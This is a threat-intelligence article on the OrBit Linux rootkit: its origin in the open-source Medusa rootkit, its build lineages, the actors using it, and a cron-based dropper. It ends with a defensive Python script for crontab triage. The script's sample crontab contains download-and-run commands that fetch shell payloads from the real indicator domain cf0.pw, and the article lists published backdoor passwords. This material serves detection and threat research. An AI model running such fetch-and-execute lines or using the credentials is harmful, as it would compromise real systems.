In July 2022, security researchers published the first analysis of OrBit, a then-undocumented Linux userland rootkit. Its capabilities put defenders on alert: broad libc hooking, a passive SSH backdoor, and PAM-based credential harvesting. At the time, OrBit looked like a bespoke, heavily customized tool tied to a single operator.
It wasn't. A deep dive by Nicole, a malware analyst and reverse engineer at Intezer, tells a different origin story. By collecting and analyzing over a dozen samples spanning 2022 through 2026, the research shows that OrBit is not an original piece of malware authorship. It is a repackaged and selectively configured build of Medusa, an open-source LD_PRELOAD rootkit published on GitHub in December 2022.
As Nicole summarizes in her report, “The story of OrBit’s four-year evolution is not one of novel development; it’s the story of how a publicly available rootkit was forked, configured, and redeployed.”
To understand how this shared code footprint stayed under the radar for so long, one must look at how OrBit operates. Deployed as a shared library (.so), it persists by subverting the dynamic loader: it patches ld.so so that the malicious library is loaded into every new dynamically linked process the loader starts. Unlike a rootkit that relies only on an /etc/ld.so.preload entry, a patched loader keeps working after that file has been cleaned, and it survives reboots because it lives in the loader binary itself.
Crucially, it has traditionally operated as a passive implant. It generates no beaconing traffic and does not poll a Command-and-Control (C2) server; the attacker simply connects in through an SSH backdoor. Once installed, its hooks on PAM (Pluggable Authentication Modules) functions passively harvest credentials from SSH and sudo authentications and write them to a hidden directory (/lib/libntpVnQE6mk/ or /lib/libseconf/) that the rootkit's own file-hiding hooks cloak from administrators. The cloaking only holds inside hooked processes: a statically linked tool, a rescue boot, or a disk image taken from a clean host sees the directory.
Nicole's differential analysis revealed that the operators have not been writing new code. Rather, they have been toggling features like options on a menu, and the malware's evolution splits into two parallel lineages:
- Lineage A ("Full" Build): A full-featured variant that tracks the upstream source closely and keeps its advanced capabilities enabled.
- Lineage B ("Lite" Fork): A stripped-down, stealthier version appearing between 2023 and 2024 that drops entire capability domains (PAM interception, packet capture via pcap, and TCP-port hiding) in exchange for a smaller footprint.
Over the last four years, different criminal elements have customized these lineages by rotating XOR obfuscation keys, shifting install paths, swapping backdoor credentials, and turning on features that already existed in the upstream source.
For example, when a custom xread wrapper appeared in 2023 to route the malware's own reads around its I/O hooks, so that hooked read() calls no longer corrupted Git operations and SSH protocol streams, it looked like an innovative patch. It wasn't: xread had been sitting in Medusa's advanced hook file (src/rknet.c) from the start. The operators simply changed their Makefile to link it in.
Similarly, a large capability jump occurred in 2025 when Lineage A samples began hooking pam_sm_authenticate. That moved the backdoor from passive credential harvester to active gatekeeper: a hook at that layer can decide the outcome of an authentication regardless of what the real module returns, so it can admit a password the genuine PAM stack would reject. Again, this was already built into the upstream Medusa source.
Because Medusa is publicly available, OrBit breaks the traditional "one malware, one threat actor" attribution model. Nicole's analysis finds that at least three unrelated threat clusters have weaponized this same codebase for different objectives:
- The state-sponsored espionage group tracked as UNC3886 deployed a 2024 Lineage A cluster distinguished by a 0xAA XOR key. Mandiant's reporting on this group had already documented its use of "MEDUSA" against VMware and Juniper infrastructure. Nicole's reverse engineering closed the loop: the group's binary left behind a careless plaintext artifact, a redirected strace output file containing the literal word "orbit", tying the Mandiant-tracked MEDUSA deployments to the OrBit builds.
- The eCrime adversary BLOCKADE SPIDER (known for orchestrating Embargo ransomware campaigns) has used the OrBit backdoor since at least 2024, relying on its stealthy persistence to maintain access to hijacked virtualization environments such as VMware vCenter.
- Perhaps the most significant operational shift found in 2025 samples was a new two-stage "infector" architecture. It broke OrBit's long-standing passive design by introducing its first outbound C2 channel: a cron job that periodically fetches payloads from the domain cf0[.]pw. For defenders this is a double-edged change, since an implant that never phoned home now produces a network indicator.
In a historical twist, Nicole found that the structure of this new dropper is identical to a loader used six years earlier in the 2020 Linux-based RHOMBUS botnet campaign, served from the same Russia-hosted infrastructure.
The appearance of fresh Lineage A samples well into 2026, complete with new backdoor credentials such as jokerteam and 57ill4Cu63, shows that this open-source toolkit is not going away anytime soon.
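Because the cron-based stage is the first part of OrBit that leaves a network footprint, the check worth adding to an incident playbook is a pass over crontabs for download commands and a match of the fetched host against the published indicator. The script below is an added example, not code from the report; the crontab it parses is constructed for the demo, and the only real indicator in it is cf0[.]pw, written defanged in the IOC list and refanged only for matching.

```python
#!/usr/bin/env python3
"""Added example (not from the Intezer report): flag crontab entries
that fetch a remote payload with curl or wget, the outbound channel the
2025 "infector" stage introduced, and match the host against an IOC
list kept in defanged form.

CRONTAB below is constructed for the demo; cf0[.]pw is the only real
indicator and comes from the text.
"""
import re

IOC_DOMAINS = {"cf0[.]pw"}  # stored defanged, as published

# Heuristics, not a full shell parser: a download tool anywhere in a
# sub-command, and a token that looks like a URL or bare hostname.
_FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
_HOST_RE = re.compile(
    r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)(?::\d+)?(?:/\S*)?", re.I)


def refang(ioc):
    """'cf0[.]pw' -> 'cf0.pw', 'hxxp://' -> 'http://'."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def parse_cron_line(line):
    """(schedule, command) for one user-crontab entry, or None for blank
    lines, comments and VAR=value assignments. Handles the five-field
    schedule and @reboot-style shortcuts."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    if line.startswith("@"):
        sched, _, cmd = line.partition(" ")
        return sched, cmd.strip()
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def fetch_hosts(command):
    """Hostnames handed to curl/wget. Each pipe/semicolon/&-separated
    sub-command is examined on its own so 'curl ... | sh' is caught."""
    hosts = set()
    for sub in re.split(r"[|;&]+", command):
        if not _FETCH_RE.search(sub):
            continue
        for tok in sub.split():
            m = _HOST_RE.fullmatch(tok)
            if m and not tok.startswith("-"):
                hosts.add(m.group(1).lower())
    return hosts


def triage(crontab_text, iocs=IOC_DOMAINS):
    """[(schedule, host, verdict)] for every remote fetch found.
    'IOC match' covers the domain and its subdomains; anything else is
    'review' because a scheduled download is still worth a look."""
    real = {refang(d) for d in iocs}
    results = []
    for line in crontab_text.splitlines():
        parsed = parse_cron_line(line)
        if not parsed:
            continue
        sched, cmd = parsed
        for host in sorted(fetch_hosts(cmd)):
            hit = any(host == d or host.endswith("." + d) for d in real)
            results.append((sched, host, "IOC match" if hit else "review"))
    return results


# Constructed sample crontab: one benign job, one benign download, and
# two entries shaped like a dropper that pulls its payload on a schedule.
CRONTAB = """\
# constructed sample for the demo
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/10 * * * * curl -fsSL http://cf0.pw/x.sh | sh
30 2 * * * wget -q https://mirror.example.org/feed.xml -O /var/tmp/feed.xml
@reboot wget -q -O /tmp/.a http://cf0.pw/a && sh /tmp/.a
"""

if __name__ == "__main__":
    for sched, host, verdict in triage(CRONTAB):
        print(f"{verdict:10} {host:22} [{sched}]")
```

Point it at the real inputs by feeding `triage()` the contents of /var/spool/cron/crontabs/*, /etc/cron.d/* (whose system format carries an extra user field between schedule and command, so strip that first) and the output of `crontab -l` for each user.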